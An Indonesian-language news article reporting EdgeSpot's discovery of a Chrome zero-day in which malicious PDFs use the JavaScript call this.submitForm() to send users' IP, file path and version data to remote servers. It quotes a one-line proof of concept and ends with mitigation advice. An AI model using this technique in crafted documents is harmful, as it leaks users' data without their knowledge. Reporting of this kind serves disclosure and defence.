Layanan deteksi eksploitasi EdgeSpot menemukan kerentanan Chrome zero-day yang menarik yang mengeksploitasi dokumen PDF. Kerentanan memungkinkan penyerang untuk mengambil data sensitif menggunakan dokumen PDF berbahaya yang dibuka di Chrome.

Segera setelah korban membuka file PDF masing-masing di Google Chrome, program jahat mulai bekerja di latar belakang dengan mengumpulkan data pengguna.

Data tersebut kemudian diteruskan ke server jauh yang sedang dikendalikan oleh para peretas. Anda mungkin bertanya-tanya data apa yang sedang dihisap oleh para penyerang, mereka menargetkan data berikut pada PC Anda:

• alamat IP
• Path lengkap file PDF pada sistem
• Versi OS dan Chrome

Waspadalah terhadap file PDF yang ditunggangi malware

Anda mungkin terkejut mengetahui bahwa tidak ada yang terjadi ketika Adobe Reader digunakan untuk membuka file PDF. Selain itu, permintaan HTTP POST digunakan untuk mentransfer data ke server jarak jauh tanpa campur tangan pengguna.

Para ahli melihat bahwa salah satu dari dua domain readnotifycom atau burpcollaboratornet menerima data.

Anda dapat membayangkan intensitas serangan dengan mempertimbangkan fakta bahwa sebagian besar perangkat lunak antivirus tidak dapat mendeteksi sampel yang terdeteksi oleh EdgeSpot.

Para ahli mengungkapkan bahwa para penyerang menggunakan API Javascript PDF "this.submitForm ()" untuk mengumpulkan informasi sensitif para pengguna.

Kami mengujinya dengan PoC minimal, panggilan API sederhana seperti "this.submitForm ('http://google.com/test')" akan membuat Google Chrome mengirim data pribadi ke google.com.

Para ahli sebenarnya menemukan bahwa bug Chrome ini sedang dieksploitasi oleh dua set file PDF berbahaya yang berbeda. Keduanya diedarkan masing-masing pada Oktober 2017 dan September 2018.

Khususnya, data yang dikumpulkan dapat digunakan oleh penyerang untuk menyempurnakan serangan di masa depan. Laporan menyarankan bahwa kumpulan file pertama dikompilasi menggunakan layanan pelacakan PDF ReadNotify.

Pengguna dapat memanfaatkan layanan untuk melacak pandangan pengguna. EdgeSpot belum membagikan detail apa pun tentang sifat set kedua file PDF.

Cara Tetap Terlindungi

Layanan deteksi Eksploit EdgeSpot ingin memberi tahu pengguna Chrome tentang risiko potensial karena tambalan tidak diharapkan akan dirilis dalam waktu dekat.

EdgeSpot melaporkan ke Google tentang kerentanan tahun lalu dan perusahaan berjanji akan merilis patch akhir April. H

Namun, Anda dapat mempertimbangkan untuk menggunakan solusi sementara untuk masalah tersebut dengan melihat secara lokal dokumen PDF yang diterima menggunakan aplikasi pembaca PDF alternatif.

Atau, Anda juga dapat membuka dokumen PDF di Chrome dengan memutuskan sistem Anda dari Internet. Sementara itu, Anda bisa menunggu pembaruan Chrome 74 yang diharapkan akan diluncurkan pada 23 April.